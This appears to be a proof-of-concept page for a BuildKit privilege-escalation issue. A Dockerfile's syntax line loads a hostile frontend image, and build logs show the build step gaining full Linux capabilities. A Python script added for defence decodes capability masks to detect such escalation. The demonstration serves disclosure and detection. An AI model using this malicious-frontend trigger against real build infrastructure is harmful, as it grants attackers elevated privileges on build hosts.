Introduction
```dockerfile
#syntax=docker.io/zdfa/evilerfile
FROM alpine
RUN grep Cap /proc/self/status
```
```shell
sudo bin/buildctl build \
--frontend=dockerfile.v0 \
--local context=. \
--local dockerfile=.
```
```
➜ cp sudo bin/buildctl build \
--frontend=dockerfile.v0 \
--local context=. \
--local dockerfile=.
[+] Building 5.3s (6/6) FINISHED
=> [internal] load .dockerignore 0.0s
=> => transferring context: 2B 0.0s
=> [internal] load build definition from Dockerfile 0.0s
=> => transferring dockerfile: 114B 0.0s
=> resolve image config for docker.io/zdfa/evilerfile:latest 1.0s
=> CACHED docker-image://docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e 0.0s
=> => resolve docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e 0.0s
=> docker-image://docker.io/library/alpine:latest 4.0s
=> => resolve docker.io/library/alpine:latest 4.0s
=> [auth] library/alpine:pull token for registry-1.docker.io 0.0s
Dockerfile:1
--------------------
1 | >>> #syntax=docker.io/zdfa/evilerfile
2 | FROM alpine
3 | RUN grep Cap /proc/self/status
--------------------
error: failed to solve: grep Cap /proc/self/status
grep Cap /proc/self/status
% grep Cap /proc/self/status
CapInh: 000001ffffffffff
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 000001ffffffffff
% exit 99
: exit code: 99
```
```dockerfile
#syntax=docker.io/zdfa/evilerfile
FROM alpine as sandbox
RUN grep Cap /proc/self/status
```
```shell
➜ cp sudo bin/buildctl build \
--frontend=dockerfile.v0 \
--local context=. \
--local dockerfile=.
[+] Building 2.8s (7/7) FINISHED
=> [internal] load build definition from Dockerfile 0.1s
=> => transferring dockerfile: 125B 0.0s
=> [internal] load .dockerignore 0.0s
=> => transferring context: 2B 0.0s
=> resolve image config for docker.io/zdfa/evilerfile:latest 2.0s
=> [auth] zdfa/evilerfile:pull token for registry-1.docker.io 0.0s
=> CACHED docker-image://docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e 0.0s
=> => resolve docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e 0.0s
=> CACHED docker-image://docker.io/library/alpine:latest 0.5s
=> => resolve docker.io/library/alpine:latest 0.5s
=> [auth] library/alpine:pull token for registry-1.docker.io 0.0s
Dockerfile:1
--------------------
1 | >>> #syntax=docker.io/zdfa/evilerfile
2 | FROM alpine as sandbox
3 | RUN grep Cap /proc/self/status
--------------------
error: failed to solve: grep Cap /proc/self/status
grep Cap /proc/self/status
% grep Cap /proc/self/status
CapInh: 0000000000000000
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
% exit 99
: exit code: 99
```
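The two transcripts above differ in the capability masks that `grep Cap /proc/self/status` prints: `000001ffffffffff` in the first run and `00000000a80425fb` in the second. The following Python is an added example, not part of the PoC repository: it decodes such masks into capability names and reports what a process holds beyond a baseline. The function names are hypothetical, and the baseline is an assumption: it is simply the second run's `CapEff` value.

```python
import re

# Linux capability names indexed by bit number (CAP_CHOWN is bit 0).
CAP_NAMES = """CHOWN DAC_OVERRIDE DAC_READ_SEARCH FOWNER FSETID KILL SETGID SETUID
SETPCAP LINUX_IMMUTABLE NET_BIND_SERVICE NET_BROADCAST NET_ADMIN NET_RAW IPC_LOCK
IPC_OWNER SYS_MODULE SYS_RAWIO SYS_CHROOT SYS_PTRACE SYS_PACCT SYS_ADMIN SYS_BOOT
SYS_NICE SYS_RESOURCE SYS_TIME SYS_TTY_CONFIG MKNOD LEASE AUDIT_WRITE AUDIT_CONTROL
SETFCAP MAC_OVERRIDE MAC_ADMIN SYSLOG WAKE_ALARM BLOCK_SUSPEND AUDIT_READ PERFMON
BPF CHECKPOINT_RESTORE""".split()

# Assumption: the CapEff value of the second run on this page serves as the baseline.
BASELINE = 0x00000000A80425FB

# Cap* lines copied from the first and second transcript on this page.
FIRST_RUN = """CapInh: 000001ffffffffff
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 000001ffffffffff
"""
SECOND_RUN = """CapInh: 0000000000000000
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
"""

CAP_LINE = re.compile(r"^(Cap(?:Inh|Prm|Eff|Bnd|Amb)):\s*([0-9a-fA-F]+)\s*$", re.M)

def parse_caps(status_text):
    """Map 'CapEff' etc. to integer masks from /proc/<pid>/status text."""
    return {k: int(v, 16) for k, v in CAP_LINE.findall(status_text)}

def decode(mask):
    """Names of the bits set in mask; bits past the known table become CAP_<n>."""
    return ["CAP_" + (CAP_NAMES[b] if b < len(CAP_NAMES) else str(b))
            for b in range(mask.bit_length()) if mask >> b & 1]

def audit(status_text, baseline=BASELINE):
    """Report effective capabilities outside the baseline, plus any ambient ones."""
    caps = parse_caps(status_text)
    if "CapEff" not in caps:
        raise ValueError("no CapEff line found")
    extra = decode(caps["CapEff"] & ~baseline)
    return {"extra": extra, "ambient": decode(caps.get("CapAmb", 0))}

if __name__ == "__main__":
    for label, text in (("first run", FIRST_RUN), ("second run", SECOND_RUN)):
        print(label, audit(text))
```

A non-empty `extra` list for a build step, or any ambient capability, is the signal worth alerting on when the same check is run against the `/proc/<pid>/status` of build containers.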
File snapshot
```
[4.0K]  /data/pocs/6e5d3c5a164d484fedd9fc607728ae3ce55938f0
├── [4.0K]  cmd
│   └── [4.0K]  eviler
│       └── [3.8K]  main.go
├── [ 300]  Dockerfile
├── [ 122]  go.mod
├── [322K]  go.sum
└── [5.4K]  README.md

2 directories, 5 files
```